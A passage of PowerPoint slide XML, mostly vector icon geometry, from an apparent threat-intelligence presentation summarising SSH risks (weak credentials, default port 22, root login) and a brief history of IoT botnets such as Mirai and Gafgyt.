                  <a:pt x="46935" y="3804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28" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691546" y="6179945"/>
            <a:ext cx="2126605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Largest botnet detected: </a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="881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227,000 devices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7660" y="6435777"/>
            <a:ext cx="83945" cy="111927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="83945" h="111927">
                <a:moveTo>
                  <a:pt x="46913" y="3804"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="44180" y="1071"/>
                  <a:pt x="39743" y="1071"/>
                  <a:pt x="37010" y="3804"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2033" y="38781"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-700" y="41513"/>
                  <a:pt x="-700" y="45951"/>
                  <a:pt x="2033" y="48684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4766" y="51416"/>
                  <a:pt x="9203" y="51416"/>
                  <a:pt x="11936" y="48684"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34977" y="25643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34977" y="106680"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34977" y="110549"/>
                  <a:pt x="38103" y="113675"/>
                  <a:pt x="41972" y="113675"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45842" y="113675"/>
                  <a:pt x="48968" y="110549"/>
                  <a:pt x="48968" y="106680"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48968" y="25643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72009" y="48684"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74742" y="51416"/>
                  <a:pt x="79179" y="51416"/>
                  <a:pt x="81912" y="48684"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84644" y="45951"/>
                  <a:pt x="84644" y="41513"/>
                  <a:pt x="81912" y="38781"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46935" y="3804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30" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691546" y="6403798"/>
            <a:ext cx="231847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AI-generated polymorphic malware on the rise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7184" y="1267169"/>
            <a:ext cx="5676275" cy="3413760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5676275" h="3413760">
                <a:moveTo>
                  <a:pt x="63974" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5612302" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5647633" y="0"/>
                  <a:pt x="5676275" y="28642"/>
                  <a:pt x="5676275" y="63974"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5676275" y="3349786"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5676275" y="3385118"/>
                  <a:pt x="5647633" y="3413760"/>
                  <a:pt x="5612302" y="3413760"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63974" y="3413760"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28642" y="3413760"/>
                  <a:pt x="0" y="3385118"/>
                  <a:pt x="0" y="3349786"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="63974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="28666"/>
                  <a:pt x="28666" y="0"/>
                  <a:pt x="63974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361076" y="1431061"/>
            <a:ext cx="5420443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59E0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SSH Security Vulnerabilities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65073" y="1786828"/>
            <a:ext cx="5340496" cy="839449"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="839449">
                <a:moveTo>
                  <a:pt x="31983" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308513" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326176" y="0"/>
                  <a:pt x="5340496" y="14319"/>
                  <a:pt x="5340496" y="31983"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="807466"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="825130"/>
                  <a:pt x="5326176" y="839449"/>
                  <a:pt x="5308513" y="839449"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31983" y="839449"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14319" y="839449"/>
                  <a:pt x="0" y="825130"/>
                  <a:pt x="0" y="807466"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14331"/>
                  <a:pt x="14331" y="0"/>
                  <a:pt x="3198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516974" y="2014678"/>
            <a:ext cx="159895" cy="159895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="159895" h="159895">
                <a:moveTo>
                  <a:pt x="104931" y="109928"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="135286" y="109928"/>
                  <a:pt x="159895" y="85319"/>
                  <a:pt x="159895" y="54964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159895" y="24609"/>
                  <a:pt x="135286" y="0"/>
                  <a:pt x="104931" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74576" y="0"/>
                  <a:pt x="49967" y="24609"/>
                  <a:pt x="49967" y="54964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49967" y="60804"/>
                  <a:pt x="50873" y="66456"/>
                  <a:pt x="52559" y="71734"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2186" y="122107"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="781" y="123513"/>
                  <a:pt x="0" y="125418"/>
                  <a:pt x="0" y="127416"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="152400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="156554"/>
                  <a:pt x="3342" y="159895"/>
                  <a:pt x="7495" y="159895"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32479" y="159895"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36632" y="159895"/>
                  <a:pt x="39974" y="156554"/>
                  <a:pt x="39974" y="152400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="39974" y="139908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52466" y="139908"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56619" y="139908"/>
                  <a:pt x="59961" y="136567"/>
                  <a:pt x="59961" y="132413"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59961" y="119921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72452" y="119921"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74451" y="119921"/>
                  <a:pt x="76356" y="119141"/>
                  <a:pt x="77761" y="117735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="88161" y="107336"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="93439" y="109022"/>
                  <a:pt x="99091" y="109928"/>
                  <a:pt x="104931" y="109928"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="117423" y="29980"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124317" y="29980"/>
                  <a:pt x="129915" y="35578"/>
                  <a:pt x="129915" y="42472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="129915" y="49367"/>
                  <a:pt x="124317" y="54964"/>
                  <a:pt x="117423" y="54964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110529" y="54964"/>
                  <a:pt x="104931" y="49367"/>
                  <a:pt x="104931" y="42472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104931" y="35578"/>
                  <a:pt x="110529" y="29980"/>
                  <a:pt x="117423" y="2998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5" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792793" y="1918741"/>
            <a:ext cx="1303145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Weak Credentials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792793" y="2110615"/>
            <a:ext cx="1295150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97% of identity intrusions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96987" y="2334468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Nearly all successful breaches exploit weak or default passwords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65073" y="2730209"/>
            <a:ext cx="5340496" cy="839449"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="839449">
                <a:moveTo>
                  <a:pt x="31983" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308513" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326176" y="0"/>
                  <a:pt x="5340496" y="14319"/>
                  <a:pt x="5340496" y="31983"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="807466"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="825130"/>
                  <a:pt x="5326176" y="839449"/>
                  <a:pt x="5308513" y="839449"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31983" y="839449"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14319" y="839449"/>
                  <a:pt x="0" y="825130"/>
                  <a:pt x="0" y="807466"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14331"/>
                  <a:pt x="14331" y="0"/>
                  <a:pt x="3198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526967" y="2958059"/>
            <a:ext cx="139908" cy="159895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="139908" h="159895">
                <a:moveTo>
                  <a:pt x="89941" y="19987"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="109928" y="19987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109928" y="149902"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="109928" y="155429"/>
                  <a:pt x="114394" y="159895"/>
                  <a:pt x="119921" y="159895"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="129915" y="159895"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="135442" y="159895"/>
                  <a:pt x="139908" y="155429"/>
                  <a:pt x="139908" y="149902"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="139908" y="144374"/>
                  <a:pt x="135442" y="139908"/>
                  <a:pt x="129915" y="139908"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="129915" y="19987"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="129915" y="8963"/>
                  <a:pt x="120952" y="0"/>
                  <a:pt x="109928" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29980" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18956" y="0"/>
                  <a:pt x="9993" y="8963"/>
                  <a:pt x="9993" y="19987"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9993" y="139908"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4466" y="139908"/>
                  <a:pt x="0" y="144374"/>
                  <a:pt x="0" y="149902"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="155429"/>
                  <a:pt x="4466" y="159895"/>
                  <a:pt x="9993" y="159895"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79948" y="159895"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="85475" y="159895"/>
                  <a:pt x="89941" y="155429"/>
                  <a:pt x="89941" y="149902"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89941" y="19987"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49967" y="79948"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="49967" y="74432"/>
                  <a:pt x="54445" y="69954"/>
                  <a:pt x="59961" y="69954"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65476" y="69954"/>
                  <a:pt x="69954" y="74432"/>
                  <a:pt x="69954" y="79948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69954" y="85463"/>
                  <a:pt x="65476" y="89941"/>
                  <a:pt x="59961" y="89941"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54445" y="89941"/>
                  <a:pt x="49967" y="85463"/>
                  <a:pt x="49967" y="79948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40" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792793" y="2862122"/>
            <a:ext cx="903407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Default Ports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792793" y="3053996"/>
            <a:ext cx="89541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22 exposure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96987" y="3277849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Default SSH port makes services easy targets for automated scans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65073" y="3673590"/>
            <a:ext cx="5340496" cy="839449"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="839449">
                <a:moveTo>
                  <a:pt x="31983" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308513" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326176" y="0"/>
                  <a:pt x="5340496" y="14319"/>
                  <a:pt x="5340496" y="31983"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="807466"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="825130"/>
                  <a:pt x="5326176" y="839449"/>
                  <a:pt x="5308513" y="839449"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31983" y="839449"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14319" y="839449"/>
                  <a:pt x="0" y="825130"/>
                  <a:pt x="0" y="807466"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14331"/>
                  <a:pt x="14331" y="0"/>
                  <a:pt x="31983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6506980" y="3901440"/>
            <a:ext cx="179882" cy="159895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="179882" h="159895">
                <a:moveTo>
                  <a:pt x="69954" y="77449"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="90637" y="77449"/>
                  <a:pt x="107430" y="60657"/>
                  <a:pt x="107430" y="39974"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107430" y="19291"/>
                  <a:pt x="90637" y="2498"/>
                  <a:pt x="69954" y="2498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49271" y="2498"/>
                  <a:pt x="32479" y="19291"/>
                  <a:pt x="32479" y="39974"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32479" y="60657"/>
                  <a:pt x="49271" y="77449"/>
                  <a:pt x="69954" y="77449"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="60679" y="94938"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="29918" y="94938"/>
                  <a:pt x="4997" y="119859"/>
                  <a:pt x="4997" y="150620"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4997" y="155742"/>
                  <a:pt x="9150" y="159895"/>
                  <a:pt x="14272" y="159895"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="92814" y="159895"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="81509" y="146591"/>
                  <a:pt x="74951" y="129446"/>
                  <a:pt x="74951" y="111302"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74951" y="101590"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74951" y="99310"/>
                  <a:pt x="75263" y="97061"/>
                  <a:pt x="75856" y="94938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60679" y="94938"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="139065" y="152556"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134911" y="154524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134911" y="95781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164892" y="105774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164892" y="111895"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164892" y="129321"/>
                  <a:pt x="154836" y="145155"/>
                  <a:pt x="139065" y="152587"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="131757" y="81041"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="96780" y="92689"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92689" y="94063"/>
                  <a:pt x="89941" y="97873"/>
                  <a:pt x="89941" y="102183"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89941" y="111895"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89941" y="135130"/>
                  <a:pt x="103370" y="156272"/>
                  <a:pt x="124356" y="166141"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="130133" y="168858"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131632" y="169545"/>
                  <a:pt x="133256" y="169920"/>
                  <a:pt x="134880" y="169920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136504" y="169920"/>
                  <a:pt x="138159" y="169545"/>
                  <a:pt x="139627" y="168858"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="145405" y="166141"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166453" y="156241"/>
                  <a:pt x="179882" y="135099"/>
                  <a:pt x="179882" y="111864"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="179882" y="102152"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="179882" y="97842"/>
                  <a:pt x="177134" y="94032"/>
                  <a:pt x="173043" y="92658"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="138066" y="81009"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="136005" y="80322"/>
                  <a:pt x="133787" y="80322"/>
                  <a:pt x="131757" y="81009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45" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792793" y="3805503"/>
            <a:ext cx="943381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Root Access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792793" y="3997377"/>
            <a:ext cx="935386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Unrestricted login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96987" y="4221230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Direct root login increases privilege escalation risks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97184" y="4816839"/>
            <a:ext cx="5676275" cy="1910746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5676275" h="1910746">
                <a:moveTo>
                  <a:pt x="63953" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5612323" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5647643" y="0"/>
                  <a:pt x="5676275" y="28633"/>
                  <a:pt x="5676275" y="63953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5676275" y="1846794"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5676275" y="1882114"/>
                  <a:pt x="5647643" y="1910746"/>
                  <a:pt x="5612323" y="1910746"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63953" y="1910746"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28633" y="1910746"/>
                  <a:pt x="0" y="1882114"/>
                  <a:pt x="0" y="1846794"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="63953"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="28656"/>
                  <a:pt x="28656" y="0"/>
                  <a:pt x="6395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6361076" y="4980732"/>
            <a:ext cx="5420443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Botnet Evolution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61076" y="5300522"/>
            <a:ext cx="68754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Mirai (2016):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056120" y="5300522"/>
            <a:ext cx="3973393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Pioneered IoT device targeting, source code leaked leading to dozens of variants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61076" y="5524375"/>
            <a:ext cx="415727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Gafgyt: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786672" y="5524375"/>
            <a:ext cx="3469723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Bashlite variant with modular architecture, multiple DDoS attack types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61076" y="5748228"/>
            <a:ext cx="83944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Modern Strains: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204523" y="5748228"/>
            <a:ext cx="350170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Enhanced evasion, opportunistic credential stuffing, modular payloads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65073" y="6008058"/>
            <a:ext cx="5340496" cy="519659"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5340496" h="519659">
                <a:moveTo>
                  <a:pt x="31980" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5308516" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5326178" y="0"/>
                  <a:pt x="5340496" y="14318"/>
                  <a:pt x="5340496" y="31980"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5340496" y="487679"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5340496" y="505341"/>
                  <a:pt x="5326178" y="519659"/>
                  <a:pt x="5308516" y="519659"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="31980" y="519659"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14330" y="519659"/>
                  <a:pt x="0" y="505329"/>
                  <a:pt x="0" y="487679"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="31980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14330"/>
                  <a:pt x="14330" y="0"/>
                  <a:pt x="31980" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="6366F1">
              <a:alpha val="10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="6366F1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6480997" y="6131976"/>
            <a:ext cx="111927" cy="111927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="111927" h="111927">
                <a:moveTo>
                  <a:pt x="55963" y="111927"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="86850" y="111927"/>
                  <a:pt x="111927" y="86850"/>
                  <a:pt x="111927" y="55963"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111927" y="25076"/>
                  <a:pt x="86850" y="0"/>
                  <a:pt x="55963" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25076" y="0"/>
                  <a:pt x="0" y="25076"/>
                  <a:pt x="0" y="55963"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="86850"/>
                  <a:pt x="25076" y="111927"/>
                  <a:pt x="55963" y="111927"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="48968" y="34977"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48968" y="31116"/>
                  <a:pt x="52102" y="27982"/>
                  <a:pt x="55963" y="27982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59824" y="27982"/>
                  <a:pt x="62959" y="31116"/>
                  <a:pt x="62959" y="34977"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62959" y="38838"/>
                  <a:pt x="59824" y="41972"/>
                  <a:pt x="55963" y="41972"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52102" y="41972"/>
                  <a:pt x="48968" y="38838"/>
                  <a:pt x="48968" y="34977"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47219" y="48968"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57712" y="48968"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="60620" y="48968"/>
                  <a:pt x="62959" y="51307"/>
                  <a:pt x="62959" y="54214"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="62959" y="73452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64708" y="73452"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="67615" y="73452"/>
                  <a:pt x="69954" y="75791"/>
                  <a:pt x="69954" y="78698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69954" y="81606"/>
                  <a:pt x="67615" y="83945"/>
                  <a:pt x="64708" y="83945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47219" y="83945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44312" y="83945"/>
                  <a:pt x="41972" y="81606"/>
                  <a:pt x="41972" y="78698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41972" y="75791"/>
                  <a:pt x="44312" y="73452"/>
                  <a:pt x="47219" y="73452"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52466" y="73452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52466" y="59461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47219" y="59461"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44312" y="59461"/>
                  <a:pt x="41972" y="57122"/>
                  <a:pt x="41972" y="54214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41972" y="51307"/>
                  <a:pt x="44312" y="48968"/>
                  <a:pt x="47219" y="48968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58" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649176" y="6107992"/>
            <a:ext cx="5012422" cy="319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 Context:</a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="88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Current findings align with global threat intelligence, confirming persistent IoT botnet activity and SSH as primary attack vector.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919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5235" y="355235"/>
            <a:ext cx="833266" cy="289450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="833266" h="289450">
                <a:moveTo>
                  <a:pt x="35084" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="798182" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="817558" y="0"/>
                  <a:pt x="833266" y="15708"/>
                  <a:pt x="833266" y="35084"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="833266" y="254366"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="833266" y="273743"/>
                  <a:pt x="817558" y="289450"/>
                  <a:pt x="798182" y="289450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35084" y="289450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="289450"/>
                  <a:pt x="0" y="273743"/>
                  <a:pt x="0" y="254366"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35084"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15708"/>
                  <a:pt x="15708" y="0"/>
                  <a:pt x="35084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 w="12700">
            <a:solidFill>
              <a:srgbClr val="10B981">
                <a:alpha val="40000"/>
              </a:srgbClr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464875" y="438561"/>
            <a:ext cx="666065" cy="14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9" b="1" spc="41" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="10B98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Synthesis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849" y="754325"/>
            <a:ext cx="11700812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5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Findings &amp; Implications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5235" y="1390239"/>
            <a:ext cx="5631125" cy="2447171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
